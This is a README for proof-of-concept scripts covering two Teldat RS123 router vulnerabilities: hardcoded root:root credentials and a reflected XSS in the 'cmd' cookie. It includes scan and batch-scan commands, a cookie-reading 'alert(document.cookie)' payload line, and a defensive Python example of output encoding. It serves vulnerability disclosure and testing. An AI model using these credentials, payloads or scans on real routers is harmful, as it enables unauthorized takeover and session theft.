## https://sploitus.com/exploit?id=DFA331A1-165E-5B25-855D-573E5EE30AE2
# Teldat Router CVE-2022-39996 & CVE-2022-39997 POC

> Proof of Concept for two vulnerabilities discovered in Teldat RS123 / RS123w routers.

## Overview

| CVE ID | Type | CWE | CVSS | Severity |
|--------|------|-----|------|----------|
| [CVE-2022-39996](#cve-2022-39996---reflected-xss) | Reflected XSS | CWE-79 | 6.1 | Medium |
| [CVE-2022-39997](#cve-2022-39997---weak-password) | Weak Password | CWE-521 | 9.8 | Critical |

**Affected Product:** Teldat RS123, RS123w Router

---

## CVE-2022-39997 - Weak Password

### Description

Teldat RS123/RS123w routers ship with hardcoded default credentials `root:root`. Administrators frequently leave these unchanged, allowing unauthenticated attackers to gain full administrative access via Telnet, SSH, HTTP, or other services.

### Proof

```
Account: root
Password: root
```

![Weak Password POC](https://user-images.githubusercontent.com/38815439/187359831-81c7aa38-9428-4b5a-8c6e-e91a300f263c.png)

### Usage

```bash
pip install requests paramiko

# Basic check (Telnet, SSH, HTTP)
python CVE-2022-39997.py -t 192.168.1.1

# Full check (all services including HTTPS, FTP)
python CVE-2022-39997.py -t 192.168.1.1 --all

# Batch scan
python CVE-2022-39997.py -f targets.txt
```

---

## CVE-2022-39996 - Reflected XSS

### Description

The `/upgrade/index.html` endpoint reflects the `cmd` HTTP cookie value in the response without sanitization. An attacker can craft a malicious request containing JavaScript in the `cmd` cookie. When an authenticated administrator visits the page, the script executes in the browser context of the router's web interface, enabling session hijacking or configuration manipulation.
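The flaw described above comes down to a missing output-encoding step, shown here as an added example that is not code from the POC repository or from the router firmware. The page template, function names and probe string are hypothetical stand-ins; the flawed renderer sits beside its hardened form, with a regression check that uses a harmless markup probe.

```python
import html
from urllib.parse import unquote

# Hypothetical template: stands in for the router's /upgrade/index.html,
# whose real source is not shown on this page.
TEMPLATE = "<html><body><p>Last command: {cmd}</p></body></html>"


def cookie_value(cookie_header, name):
    """Return the named cookie's value from a raw Cookie header, or ''."""
    for part in cookie_header.split(";"):
        key, _, value = part.strip().partition("=")
        if key == name:
            return unquote(value)
    return ""


def render_reflecting(cookie_header):
    """Flawed pattern: the cookie text is placed into the HTML unchanged."""
    return TEMPLATE.format(cmd=cookie_value(cookie_header, "cmd"))


def render_encoded(cookie_header):
    """Hardened pattern: HTML-encode the value before it reaches the page."""
    value = cookie_value(cookie_header, "cmd")
    return TEMPLATE.format(cmd=html.escape(value, quote=True))


def reflects_markup(render, probe="<b>probe-7f3a</b>"):
    """Regression check: True if a harmless markup probe comes back unencoded."""
    # Constructed request header; the session value is a placeholder.
    return probe in render("session=placeholder; cmd=" + probe)


if __name__ == "__main__":
    for fn in (render_reflecting, render_encoded):
        status = "reflects raw markup" if reflects_markup(fn) else "encodes output"
        print(f"{fn.__name__}: {status}")
```

The same check can be kept as a unit test for any handler that echoes request data, so a later template change that drops the encoding step is caught before release.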

### Proof

- Crafting XSS payload in the `cmd` cookie:

![XSS POC 1](https://user-images.githubusercontent.com/38815439/187361658-2b24b895-ab0c-47fd-b6fe-d569fa4d011d.png)

- XSS triggered in browser:

![XSS POC 2](https://user-images.githubusercontent.com/38815439/187362213-273af07e-9fdb-40fe-8d65-805ceef76072.png)

### Usage

```bash
pip install requests

# Basic XSS check
python CVE-2022-39996.py -t 192.168.1.1

# With HTTP Basic Auth credentials
python CVE-2022-39996.py -t 192.168.1.1 -u root -p root

# Test multiple XSS payloads for confirmation
python CVE-2022-39996.py -t 192.168.1.1 --multi

# Generate standalone POC HTML page
python CVE-2022-39996.py -t 192.168.1.1 --gen-poc

# Custom XSS payload
python CVE-2022-39996.py -t 192.168.1.1 --payload "alert(document.cookie)"
```

---

## Files

| File | Description |
|------|-------------|
| `CVE-2022-39997.py` | Weak password detection (Telnet / SSH / HTTP / FTP) |
| `CVE-2022-39996.py` | Reflected XSS detection via `cmd` cookie |
| `Teldat's Router Vulnerability.md` | Full vulnerability disclosure report |

---

## Disclaimer

These POC scripts are for **educational and authorized security testing only**. Do not use against systems you do not own or have explicit permission to test. The author is not responsible for any misuse or damage.